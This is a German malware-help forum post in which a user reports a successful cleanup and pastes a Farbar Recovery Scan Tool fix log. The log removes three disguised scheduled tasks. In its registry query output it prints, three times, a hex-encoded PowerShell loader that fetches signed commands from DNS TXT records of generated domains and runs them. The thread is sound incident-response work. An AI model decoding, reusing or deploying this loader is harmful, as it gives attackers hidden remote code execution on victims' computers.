![]() |
|
Plagegeister aller Art und deren Bekämpfung: drei Unbekannte Powershell ProzesseWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
|
![]() | #4 |
![]() | ![]() drei Unbekannte Powershell Prozesse Hallo Matthias, vielen Dank für deine Zeit. Die Reparatur konnte durchgeführt werden. Zumindest im Moment schaut es nach einem Erfolg aus. Die Links zu VirusTotal sagen mir, dass der Defender die Schädlinge nicht kennt. Gilt die Empfehlung für den Defender denn noch, oder sollte ich andere Software zum Schutz benutzen? Interessant finde ich auch wie du zu dieser Lösung gekommen bist, gibt es da Texte dazu um sowas selbst bewerkstelligen zu können? Code:
ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 06-10-2023 durchgeführt von doppo (24-10-2023 14:56:55) Run:1 Gestartet von D:\downloads Geladene Profile: doppo & kids Start-Modus: Normal ============================================== fixlist Inhalt: ***************** Start:: SystemRestore: On CreateRestorePoint: CloseProcesses: VirusTotal: C:\WINDOWS\System32\6764.tmp\6765.tmp.ps1;C:\WINDOWS\System32\80B6.tmp\80B7.tmp.ps1;C:\WINDOWS\System32\E7CD.tmp\E7CE.tmp.ps1 Task: {6286BA08-0CCA-4E26-8FF0-69CFE16D411C} - System32\Tasks\Microsoft\Windows\Input\syncpensettings0HUDRN => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-10-13] (Microsoft Windows -> Microsoft Corporation) -> -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\6764.tmp\6765.tmp.ps1" <==== ACHTUNG C:\WINDOWS\System32\6764.tmp CMD: reg query "HKLM\Software\RealteksHQZk7h" /S DeleteKey: HKLM\Software\RealteksHQZk7h Task: {0A2C9A85-0D4B-4F2D-87AF-7B9A558414F0} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verificationxx79n => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-10-13] (Microsoft Windows -> Microsoft Corporation) -> -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\80B6.tmp\80B7.tmp.ps1" <==== ACHTUNG C:\WINDOWS\System32\80B6.tmp CMD: reg query "HKLM\Software\UnwinderoMHQ2fNRF" /S DeleteKey: HKLM\Software\UnwinderoMHQ2fNRF Task: {31B09827-39E3-4AA5-B493-4669AFB8E011} - System32\Tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChangeMQFVluCYC => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-10-13] (Microsoft Windows -> Microsoft Corporation) -> -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\E7CD.tmp\E7CE.tmp.ps1" <==== ACHTUNG C:\WINDOWS\System32\E7CD.tmp CMD: reg query "HKLM\Software\NahimicNuHseCC" /S DeleteKey: HKLM\Software\NahimicNuHseCC HKLM\Software\Policies\...\system: [EnableActivityFeed] 0 HKLM\Software\Policies\...\system: [PublishUserActivities] 0 HKLM\Software\Policies\...\system: [UploadUserActivities] 0 HKLM\Software\Policies\...\system: [AllowCrossDeviceClipboard] 0 HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\...\Run: [AMDNoiseSuppression] => "C:\WINDOWS\system32\AMD\ANR\AMDNoiseSuppression.exe" (Keine Datei) HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\...\Policies\Explorer: [HideSCAMeetNow] 1 HKU\S-1-5-21-3400922340-1585523840-3734490296-1002\...\Run: [MicrosoftEdgeAutoLaunch_4F3ACAD5137A03F38014355EA53C9FBD] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [4187176 2023-10-20] (Microsoft Corporation -> Microsoft Corporation) HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] -> GroupPolicy: Beschränkung ? <==== ACHTUNG Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => %SystemRoot%\System32\MbaeParserTask.exe (Keine Datei) Task: {7E359839-10FF-4083-92B7-07B6F17CF925} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => %systemroot%\system32\MusNotification.exe /RunOnAC RebootDialog (Keine Datei) Task: {05FACDF0-6FE2-48B0-BCDE-87CD432CEA4E} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => %systemroot%\system32\MusNotification.exe /RunOnBattery RebootDialog (Keine Datei) Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Keine Datei) Task: {002C80C5-1CE2-4C73-8E35-D7B5AE35E00A} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3400922340-1585523840-3734490296-1002 => %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (Keine Datei) S3 HWiNFO_180; \??\C:\Users\*****\AppData\Local\Temp\HWiNFO64A_180.SYS [X] <==== ACHTUNG S1 npcap; \SystemRoot\system32\DRIVERS\npcap.sys [X] U4 npcap_wifi; kein ImagePath S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X] FF Extension: (Bypass Paywalls Clean) - C:\Users\AllUserName\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi [2023-10-15] [UpdateUrl:hxxps://gitlab.com/magnolia1234/bypass-paywalls-firefox-clean/-/raw/master/updates.json] CMD: cscript /nologo %systemroot%\System32\slmgr.vbs /dlv CMD: netsh winsock reset CMD: netsh int ip reset CMD: ipconfig /release CMD: ipconfig /renew CMD: ipconfig /registerdns CMD: netsh advfirewall reset CMD: netsh advfirewall set allprofiles state ON CMD: netsh winhttp reset proxy CMD: Bitsadmin /Reset /Allusers CMD: Winmgmt /salvagerepository CMD: Winmgmt /resetrepository CMD: winmgmt /resyncperf CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R CMD: sfc /scannow Hosts: RemoveProxy: EmptyTemp: End:: ***************** SystemRestore: On => abgeschlossen Wiederherstellungspunkt wurde erfolgreich erstellt. Prozesse erfolgreich geschlossen. VirusTotal: C:\WINDOWS\System32\6764.tmp\6765.tmp.ps1 => https://www.virustotal.com/gui/file/8ea840c5e0288c5eb3c0331d71597db0b1bb0df669a12eb2cd7decfb1d7f5554/detection/f-8ea840c5e0288c5eb3c0331d71597db0b1bb0df669a12eb2cd7decfb1d7f5554-1698152235 VirusTotal: C:\WINDOWS\System32\80B6.tmp\80B7.tmp.ps1 => https://www.virustotal.com/gui/file/2f6dbfd25142f0cf3681bb3aa091ed30a9a7bd87bcb8d79932972005741ae6a7/detection/f-2f6dbfd25142f0cf3681bb3aa091ed30a9a7bd87bcb8d79932972005741ae6a7-1698152236 VirusTotal: C:\WINDOWS\System32\E7CD.tmp\E7CE.tmp.ps1 => https://www.virustotal.com/gui/file/c0c40adc55d8bdc67ca0a9070db624b8ad8475dc6359c53df97ac4bbe776ec7c/detection/f-c0c40adc55d8bdc67ca0a9070db624b8ad8475dc6359c53df97ac4bbe776ec7c-1698152237 "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6286BA08-0CCA-4E26-8FF0-69CFE16D411C}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6286BA08-0CCA-4E26-8FF0-69CFE16D411C}" => erfolgreich entfernt C:\WINDOWS\System32\Tasks\Microsoft\Windows\Input\syncpensettings0HUDRN => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Input\syncpensettings0HUDRN" => erfolgreich entfernt "C:\WINDOWS\System32\6764.tmp" Ordner verschieben: C:\WINDOWS\System32\6764.tmp => erfolgreich verschoben ========= reg query "HKLM\Software\RealteksHQZk7h" /S ========= HKEY_LOCAL_MACHINE\Software\RealteksHQZk7h THk9xu3 REG_BINARY 2732463335343445382D453646452D343446412D393138392D303831384639333639343538273B0D0A246D73203D205B494F2E4D656D6F727953747265616D5D3A3A6E657728293B0D0A0D0A66756E6374696F6E204765742D55706461746573207B0D0A20202020706172616D20280D0A202020202020202024686F73746E616D650D0A20202020290D0A20202020747279207B0D0A202020202020202024646E73203D205265736F6C76652D446E734E616D65202D4E616D652024686F73746E616D65202D54797065202754585427200D0A2020202020202020246D732E5365744C656E6774682830293B0D0A2020202020202020246D732E506F736974696F6E203D20303B0D0A2020202020202020666F726561636820282474787420696E2024646E7329207B0D0A202020202020202020202020747279207B0D0A2020202020202020202020202020202069662028247478742E54797065202D6E6520275458542729207B0D0A2020202020202020202020202020202020202020636F6E74696E75653B0D0A202020202020202020202020202020207D0D0A2020202020202020202020202020202024706B74203D205B737472696E675D3A3A4A6F696E2827272C20247478742E537472696E6773293B0D0A202020202020202020202020202020206966202824706B745B305D202D657120272E2729207B0D0A2020202020202020202020202020202020202020246470203D20285B747970655D2828285B72656765785D3A3A4D6174636865732827747265766E6F43272C272E272C275269676874546F4C6566742729207C20466F7245616368207B245F2E76616C75657D29202D6A6F696E2027272929292E4765744D6574686F647328295B3330365D2E496E766F6B6528246E756C6C2C2040282824706B742E537562737472696E672831292E5265706C61636528275F272C20272B27292929293B0D0A2020202020202020202020202020202020202020246D732E506F736974696F6E203D205B426974436F6E7665727465725D3A3A546F55496E743332282464702C2030293B0D0A2020202020202020202020202020202020202020246D732E5772697465282464702C20342C202464702E4C656E677468202D2034293B0D0A202020202020202020202020202020207D0D0A2020202020202020202020207D0D0A2020202020202020202020206361746368207B0D0A2020202020202020202020207D0D0A20202020202020207D0D0A0D0A202020202020202069662028246D732E4C656E677468202D67742031333629207B0D0A202020202020202020202020246D732E506F736974696F6E203D20303B0D0A20202020202020202020202024736967203D205B627974655B5D5D3A3A6E657728313238293B0D0A2020202020202020202020202474696D657374616D70203D205B627974655B5D5D3A3A6E65772838293B0D0A20202020202020202020202024627566666572203D205B627974655B5D5D3A3A6E657728246D732E4C656E677468202D20313336293B0D0A202020202020202020202020246D732E5265616428247369672C20302C2031323829207C204F75742D4E756C6C3B0D0A202020202020202020202020246D732E52656164282474696D657374616D702C20302C203829207C204F75742D4E756C6C3B0D0A202020202020202020202020246D732E5265616428246275666665722C20302C20246275666665722E4C656E67746829207C204F75742D4E756C6C3B0D0A202020202020202020202020247075626B6579203D205B53656375726974792E43727970746F6772617068792E52534143727970746F5365727669636550726F76696465725D3A3A6E657728293B0D0A09202020205B627974655B5D5D24627974617272203D20362C322C302C302C302C3136342C302C302C38322C38332C36352C34392C302C342C302C302C312C302C312C302C3137312C3133362C31392C3133392C3231352C33312C3136392C3234322C3133332C31312C3134362C3130352C37392C31332C3134302C38382C3131392C302C322C3234392C37392C31372C37372C3135322C3232382C3136322C33312C35362C3131372C38392C36382C3138322C3139342C3137302C3235302C31362C332C37382C3130342C39322C33372C33372C392C3235302C3136342C3234342C3139352C3131382C39322C3139302C35382C32302C33352C3133342C38332C31302C3232392C3131342C3232392C3133372C3234342C3137382C31302C33312C34362C38302C3232312C37332C3132392C3234302C3138332C392C3234352C3137372C3139362C37372C3134332C37312C3134322C36302C352C3131372C3234312C35342C322C3131362C32332C3232352C3134352C35332C34362C32312C3134322C3135382C3230362C3235302C3138312C3234312C382C3131302C3130312C38342C3231382C3231392C39392C3139362C3139352C3131322C37312C39332C35352C3131312C3231382C3230392C31322C3130312C3136352C34352C31332C33362C3131382C39372C3233322C3139332C3234352C3232312C3138302C3136390D0A202020202020202020202020247075626B65792E496D706F7274437370426C6F622824627974617272293B0D0A20202020202020202020202069662028247075626B65792E5665726966794461746128246275666665722C205B53656375726974792E43727970746F6772617068792E43727970746F436F6E6669675D3A3A4D61704E616D65546F4F4944282753484132353627292C20247369672929207B0D0A2020202020202020202020202020202072657475726E20407B0D0A202020202020202020202020202020202020202074696D657374616D70203D20285B53797374656D2E426974436F6E7665727465725D3A3A546F55496E743634282474696D657374616D702C203029293B0D0A2020202020202020202020202020202020202020746578742020202020203D20285B546578742E456E636F64696E675D3A3A555446382E476574537472696E67282462756666657229293B0D0A202020202020202020202020202020207D3B0D0A2020202020202020202020207D200D0A20202020202020207D0D0A202020207D0D0A202020206361746368207B0D0A202020207D0D0A2020202072657475726E20246E756C6C3B0D0A7D0D0A0D0A7768696C652028247472756529207B0D0A20202020747279207B0D0A202020202020202024757064617465203D20407B0D0A20202020202020202020202074696D657374616D70203D20303B0D0A202020202020202020202020746578742020202020203D2027273B2020202020202020202020200D0A20202020202020207D3B0D0A2020202020202020666F72656163682028246320696E2028402822636F6D222C202278797A22292929207B0D0A202020202020202020202020666F72656163682028246120696E2028402822776D61696C222C20226661697275222C2022626964656F222C202270726976617470726F7879222C202261686F7261766964656F22292929207B0D0A20202020202020202020202020202020666F72656163682028246220696E2028402822656E64706F696E74222C2022626C6F67222C202263686174222C202263646E222C20227363686E656C6C76706E22292929207B0D0A2020202020202020202020202020202020202020747279207B0D0A2020202020202020202020202020202020202020202020202468203D202224612D24622E2463223B0D0A2020202020202020202020202020202020202020202020202472203D204765742D557064617465732024680D0A20202020202020202020202020202020202020202020202069662028246E756C6C202D6E6520247229207B0D0A202020202020202020202020202020202020202020202020202020206966202824722E74696D657374616D70202D677420247570646174652E74696D657374616D7029207B0D0A202020202020202020202020202020202020202020202020202020202020202024757064617465203D2024723B0D0A202020202020202020202020202020202020202020202020202020207D0D0A2020202020202020202020202020202020202020202020207D0D0A20202020202020202020202020202020202020207D0D0A20202020202020202020202020202020202020206361746368207B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A2020202020202020202020207D0D0A20202020202020207D0D0A0D0A202020202020202069662028247570646174652E7465787429207B0D0A202020202020202020202020246A6F62203D2053746172742D4A6F62202D536372697074426C6F636B20285B736372697074626C6F636B5D3A3A43726561746528247570646174652E7465787429293B0D0A202020202020202020202020246A6F62207C20576169742D4A6F62202D54696D656F75742031343430303B0D0A202020202020202020202020246A6F62207C2053746F702D4A6F623B0D0A20202020202020207D0D0A202020207D0D0A202020206361746368207B0D0A202020207D0D0A2020202053746172742D536C656570202D5365636F6E64732033303B0D0A7D0D0A ========= Ende von CMD: ========= HKLM\Software\RealteksHQZk7h => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{0A2C9A85-0D4B-4F2D-87AF-7B9A558414F0}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0A2C9A85-0D4B-4F2D-87AF-7B9A558414F0}" => erfolgreich entfernt C:\WINDOWS\System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verificationxx79n => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Windows Defender\Windows Defender Verificationxx79n" => erfolgreich entfernt "C:\WINDOWS\System32\80B6.tmp" Ordner verschieben: C:\WINDOWS\System32\80B6.tmp => erfolgreich verschoben ========= reg query "HKLM\Software\UnwinderoMHQ2fNRF" /S ========= HKEY_LOCAL_MACHINE\Software\UnwinderoMHQ2fNRF ZzHqeu6 REG_BINARY 2732463643363243342D383341312D343431362D393934342D384337363333373441463833273B0D0A246D73203D205B494F2E4D656D6F727953747265616D5D3A3A6E657728293B0D0A0D0A66756E6374696F6E204765742D55706461746573207B0D0A20202020706172616D20280D0A202020202020202024686F73746E616D650D0A20202020290D0A20202020747279207B0D0A202020202020202024646E73203D205265736F6C76652D446E734E616D65202D4E616D652024686F73746E616D65202D54797065202754585427200D0A2020202020202020246D732E5365744C656E6774682830293B0D0A2020202020202020246D732E506F736974696F6E203D20303B0D0A2020202020202020666F726561636820282474787420696E2024646E7329207B0D0A202020202020202020202020747279207B0D0A2020202020202020202020202020202069662028247478742E54797065202D6E6520275458542729207B0D0A2020202020202020202020202020202020202020636F6E74696E75653B0D0A202020202020202020202020202020207D0D0A2020202020202020202020202020202024706B74203D205B737472696E675D3A3A4A6F696E2827272C20247478742E537472696E6773293B0D0A202020202020202020202020202020206966202824706B745B305D202D657120272E2729207B0D0A2020202020202020202020202020202020202020246470203D20285B747970655D2828285B72656765785D3A3A4D6174636865732827747265766E6F43272C272E272C275269676874546F4C6566742729207C20466F7245616368207B245F2E76616C75657D29202D6A6F696E2027272929292E4765744D6574686F647328295B3330365D2E496E766F6B6528246E756C6C2C2040282824706B742E537562737472696E672831292E5265706C61636528275F272C20272B27292929293B0D0A2020202020202020202020202020202020202020246D732E506F736974696F6E203D205B426974436F6E7665727465725D3A3A546F55496E743332282464702C2030293B0D0A2020202020202020202020202020202020202020246D732E5772697465282464702C20342C202464702E4C656E677468202D2034293B0D0A202020202020202020202020202020207D0D0A2020202020202020202020207D0D0A2020202020202020202020206361746368207B0D0A2020202020202020202020207D0D0A20202020202020207D0D0A0D0A202020202020202069662028246D732E4C656E677468202D67742031333629207B0D0A202020202020202020202020246D732E506F736974696F6E203D20303B0D0A20202020202020202020202024736967203D205B627974655B5D5D3A3A6E657728313238293B0D0A2020202020202020202020202474696D657374616D70203D205B627974655B5D5D3A3A6E65772838293B0D0A20202020202020202020202024627566666572203D205B627974655B5D5D3A3A6E657728246D732E4C656E677468202D20313336293B0D0A202020202020202020202020246D732E5265616428247369672C20302C2031323829207C204F75742D4E756C6C3B0D0A202020202020202020202020246D732E52656164282474696D657374616D702C20302C203829207C204F75742D4E756C6C3B0D0A202020202020202020202020246D732E5265616428246275666665722C20302C20246275666665722E4C656E67746829207C204F75742D4E756C6C3B0D0A202020202020202020202020247075626B6579203D205B53656375726974792E43727970746F6772617068792E52534143727970746F5365727669636550726F76696465725D3A3A6E657728293B0D0A09202020205B627974655B5D5D24627974617272203D20362C322C302C302C302C3136342C302C302C38322C38332C36352C34392C302C342C302C302C312C302C312C302C3137312C3133362C31392C3133392C3231352C33312C3136392C3234322C3133332C31312C3134362C3130352C37392C31332C3134302C38382C3131392C302C322C3234392C37392C31372C37372C3135322C3232382C3136322C33312C35362C3131372C38392C36382C3138322C3139342C3137302C3235302C31362C332C37382C3130342C39322C33372C33372C392C3235302C3136342C3234342C3139352C3131382C39322C3139302C35382C32302C33352C3133342C38332C31302C3232392C3131342C3232392C3133372C3234342C3137382C31302C33312C34362C38302C3232312C37332C3132392C3234302C3138332C392C3234352C3137372C3139362C37372C3134332C37312C3134322C36302C352C3131372C3234312C35342C322C3131362C32332C3232352C3134352C35332C34362C32312C3134322C3135382C3230362C3235302C3138312C3234312C382C3131302C3130312C38342C3231382C3231392C39392C3139362C3139352C3131322C37312C39332C35352C3131312C3231382C3230392C31322C3130312C3136352C34352C31332C33362C3131382C39372C3233322C3139332C3234352C3232312C3138302C3136390D0A202020202020202020202020247075626B65792E496D706F7274437370426C6F622824627974617272293B0D0A20202020202020202020202069662028247075626B65792E5665726966794461746128246275666665722C205B53656375726974792E43727970746F6772617068792E43727970746F436F6E6669675D3A3A4D61704E616D65546F4F4944282753484132353627292C20247369672929207B0D0A2020202020202020202020202020202072657475726E20407B0D0A202020202020202020202020202020202020202074696D657374616D70203D20285B53797374656D2E426974436F6E7665727465725D3A3A546F55496E743634282474696D657374616D702C203029293B0D0A2020202020202020202020202020202020202020746578742020202020203D20285B546578742E456E636F64696E675D3A3A555446382E476574537472696E67282462756666657229293B0D0A202020202020202020202020202020207D3B0D0A2020202020202020202020207D200D0A20202020202020207D0D0A202020207D0D0A202020206361746368207B0D0A202020207D0D0A2020202072657475726E20246E756C6C3B0D0A7D0D0A0D0A7768696C652028247472756529207B0D0A20202020747279207B0D0A202020202020202024757064617465203D20407B0D0A20202020202020202020202074696D657374616D70203D20303B0D0A202020202020202020202020746578742020202020203D2027273B2020202020202020202020200D0A20202020202020207D3B0D0A2020202020202020666F72656163682028246320696E2028402822636F6D222C202278797A22292929207B0D0A202020202020202020202020666F72656163682028246120696E2028402822776D61696C222C20226661697275222C2022626964656F222C202270726976617470726F7879222C202261686F7261766964656F22292929207B0D0A20202020202020202020202020202020666F72656163682028246220696E2028402822656E64706F696E74222C2022626C6F67222C202263686174222C202263646E222C20227363686E656C6C76706E22292929207B0D0A2020202020202020202020202020202020202020747279207B0D0A2020202020202020202020202020202020202020202020202468203D202224612D24622E2463223B0D0A2020202020202020202020202020202020202020202020202472203D204765742D557064617465732024680D0A20202020202020202020202020202020202020202020202069662028246E756C6C202D6E6520247229207B0D0A202020202020202020202020202020202020202020202020202020206966202824722E74696D657374616D70202D677420247570646174652E74696D657374616D7029207B0D0A202020202020202020202020202020202020202020202020202020202020202024757064617465203D2024723B0D0A202020202020202020202020202020202020202020202020202020207D0D0A2020202020202020202020202020202020202020202020207D0D0A20202020202020202020202020202020202020207D0D0A20202020202020202020202020202020202020206361746368207B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A2020202020202020202020207D0D0A20202020202020207D0D0A0D0A202020202020202069662028247570646174652E7465787429207B0D0A202020202020202020202020246A6F62203D2053746172742D4A6F62202D536372697074426C6F636B20285B736372697074626C6F636B5D3A3A43726561746528247570646174652E7465787429293B0D0A202020202020202020202020246A6F62207C20576169742D4A6F62202D54696D656F75742031343430303B0D0A202020202020202020202020246A6F62207C2053746F702D4A6F623B0D0A20202020202020207D0D0A202020207D0D0A202020206361746368207B0D0A202020207D0D0A2020202053746172742D536C656570202D5365636F6E64732033303B0D0A7D0D0A ========= Ende von CMD: ========= HKLM\Software\UnwinderoMHQ2fNRF => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{31B09827-39E3-4AA5-B493-4669AFB8E011}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{31B09827-39E3-4AA5-B493-4669AFB8E011}" => erfolgreich entfernt C:\WINDOWS\System32\Tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChangeMQFVluCYC => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChangeMQFVluCYC" => erfolgreich entfernt "C:\WINDOWS\System32\E7CD.tmp" Ordner verschieben: C:\WINDOWS\System32\E7CD.tmp => erfolgreich verschoben ========= reg query "HKLM\Software\NahimicNuHseCC" /S ========= HKEY_LOCAL_MACHINE\Software\NahimicNuHseCC gzlbCQiYgEa REG_BINARY 2738373332324641452D334642432D343130342D383331302D463942384132364531453645273B0D0A246D73203D205B494F2E4D656D6F727953747265616D5D3A3A6E657728293B0D0A0D0A66756E6374696F6E204765742D55706461746573207B0D0A20202020706172616D20280D0A202020202020202024686F73746E616D650D0A20202020290D0A20202020747279207B0D0A202020202020202024646E73203D205265736F6C76652D446E734E616D65202D4E616D652024686F73746E616D65202D54797065202754585427200D0A2020202020202020246D732E5365744C656E6774682830293B0D0A2020202020202020246D732E506F736974696F6E203D20303B0D0A2020202020202020666F726561636820282474787420696E2024646E7329207B0D0A202020202020202020202020747279207B0D0A2020202020202020202020202020202069662028247478742E54797065202D6E6520275458542729207B0D0A2020202020202020202020202020202020202020636F6E74696E75653B0D0A202020202020202020202020202020207D0D0A2020202020202020202020202020202024706B74203D205B737472696E675D3A3A4A6F696E2827272C20247478742E537472696E6773293B0D0A202020202020202020202020202020206966202824706B745B305D202D657120272E2729207B0D0A2020202020202020202020202020202020202020246470203D20285B747970655D2828285B72656765785D3A3A4D6174636865732827747265766E6F43272C272E272C275269676874546F4C6566742729207C20466F7245616368207B245F2E76616C75657D29202D6A6F696E2027272929292E4765744D6574686F647328295B3330365D2E496E766F6B6528246E756C6C2C2040282824706B742E537562737472696E672831292E5265706C61636528275F272C20272B27292929293B0D0A2020202020202020202020202020202020202020246D732E506F736974696F6E203D205B426974436F6E7665727465725D3A3A546F55496E743332282464702C2030293B0D0A2020202020202020202020202020202020202020246D732E5772697465282464702C20342C202464702E4C656E677468202D2034293B0D0A202020202020202020202020202020207D0D0A2020202020202020202020207D0D0A2020202020202020202020206361746368207B0D0A2020202020202020202020207D0D0A20202020202020207D0D0A0D0A202020202020202069662028246D732E4C656E677468202D67742031333629207B0D0A202020202020202020202020246D732E506F736974696F6E203D20303B0D0A20202020202020202020202024736967203D205B627974655B5D5D3A3A6E657728313238293B0D0A2020202020202020202020202474696D657374616D70203D205B627974655B5D5D3A3A6E65772838293B0D0A20202020202020202020202024627566666572203D205B627974655B5D5D3A3A6E657728246D732E4C656E677468202D20313336293B0D0A202020202020202020202020246D732E5265616428247369672C20302C2031323829207C204F75742D4E756C6C3B0D0A202020202020202020202020246D732E52656164282474696D657374616D702C20302C203829207C204F75742D4E756C6C3B0D0A202020202020202020202020246D732E5265616428246275666665722C20302C20246275666665722E4C656E67746829207C204F75742D4E756C6C3B0D0A202020202020202020202020247075626B6579203D205B53656375726974792E43727970746F6772617068792E52534143727970746F5365727669636550726F76696465725D3A3A6E657728293B0D0A09202020205B627974655B5D5D24627974617272203D20362C322C302C302C302C3136342C302C302C38322C38332C36352C34392C302C342C302C302C312C302C312C302C3137312C3133362C31392C3133392C3231352C33312C3136392C3234322C3133332C31312C3134362C3130352C37392C31332C3134302C38382C3131392C302C322C3234392C37392C31372C37372C3135322C3232382C3136322C33312C35362C3131372C38392C36382C3138322C3139342C3137302C3235302C31362C332C37382C3130342C39322C33372C33372C392C3235302C3136342C3234342C3139352C3131382C39322C3139302C35382C32302C33352C3133342C38332C31302C3232392C3131342C3232392C3133372C3234342C3137382C31302C33312C34362C38302C3232312C37332C3132392C3234302C3138332C392C3234352C3137372C3139362C37372C3134332C37312C3134322C36302C352C3131372C3234312C35342C322C3131362C32332C3232352C3134352C35332C34362C32312C3134322C3135382C3230362C3235302C3138312C3234312C382C3131302C3130312C38342C3231382C3231392C39392C3139362C3139352C3131322C37312C39332C35352C3131312C3231382C3230392C31322C3130312C3136352C34352C31332C33362C3131382C39372C3233322C3139332C3234352C3232312C3138302C3136390D0A202020202020202020202020247075626B65792E496D706F7274437370426C6F622824627974617272293B0D0A20202020202020202020202069662028247075626B65792E5665726966794461746128246275666665722C205B53656375726974792E43727970746F6772617068792E43727970746F436F6E6669675D3A3A4D61704E616D65546F4F4944282753484132353627292C20247369672929207B0D0A2020202020202020202020202020202072657475726E20407B0D0A202020202020202020202020202020202020202074696D657374616D70203D20285B53797374656D2E426974436F6E7665727465725D3A3A546F55496E743634282474696D657374616D702C203029293B0D0A2020202020202020202020202020202020202020746578742020202020203D20285B546578742E456E636F64696E675D3A3A555446382E476574537472696E67282462756666657229293B0D0A202020202020202020202020202020207D3B0D0A2020202020202020202020207D200D0A20202020202020207D0D0A202020207D0D0A202020206361746368207B0D0A202020207D0D0A2020202072657475726E20246E756C6C3B0D0A7D0D0A0D0A7768696C652028247472756529207B0D0A20202020747279207B0D0A202020202020202024757064617465203D20407B0D0A20202020202020202020202074696D657374616D70203D20303B0D0A202020202020202020202020746578742020202020203D2027273B2020202020202020202020200D0A20202020202020207D3B0D0A2020202020202020666F72656163682028246320696E2028402822636F6D222C202278797A22292929207B0D0A202020202020202020202020666F72656163682028246120696E2028402822776D61696C222C20226661697275222C2022626964656F222C202270726976617470726F7879222C202261686F7261766964656F22292929207B0D0A20202020202020202020202020202020666F72656163682028246220696E2028402822656E64706F696E74222C2022626C6F67222C202263686174222C202263646E222C20227363686E656C6C76706E22292929207B0D0A2020202020202020202020202020202020202020747279207B0D0A2020202020202020202020202020202020202020202020202468203D202224612D24622E2463223B0D0A2020202020202020202020202020202020202020202020202472203D204765742D557064617465732024680D0A20202020202020202020202020202020202020202020202069662028246E756C6C202D6E6520247229207B0D0A202020202020202020202020202020202020202020202020202020206966202824722E74696D657374616D70202D677420247570646174652E74696D657374616D7029207B0D0A202020202020202020202020202020202020202020202020202020202020202024757064617465203D2024723B0D0A202020202020202020202020202020202020202020202020202020207D0D0A2020202020202020202020202020202020202020202020207D0D0A20202020202020202020202020202020202020207D0D0A20202020202020202020202020202020202020206361746368207B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A2020202020202020202020207D0D0A20202020202020207D0D0A0D0A202020202020202069662028247570646174652E7465787429207B0D0A202020202020202020202020246A6F62203D2053746172742D4A6F62202D536372697074426C6F636B20285B736372697074626C6F636B5D3A3A43726561746528247570646174652E7465787429293B0D0A202020202020202020202020246A6F62207C20576169742D4A6F62202D54696D656F75742031343430303B0D0A202020202020202020202020246A6F62207C2053746F702D4A6F623B0D0A20202020202020207D0D0A202020207D0D0A202020206361746368207B0D0A202020207D0D0A2020202053746172742D536C656570202D5365636F6E64732033303B0D0A7D0D0A ========= Ende von CMD: ========= HKLM\Software\NahimicNuHseCC => erfolgreich entfernt "HKLM\Software\Policies\Microsoft\Windows\System\\EnableActivityFeed" => erfolgreich entfernt "HKLM\Software\Policies\Microsoft\Windows\System\\PublishUserActivities" => erfolgreich 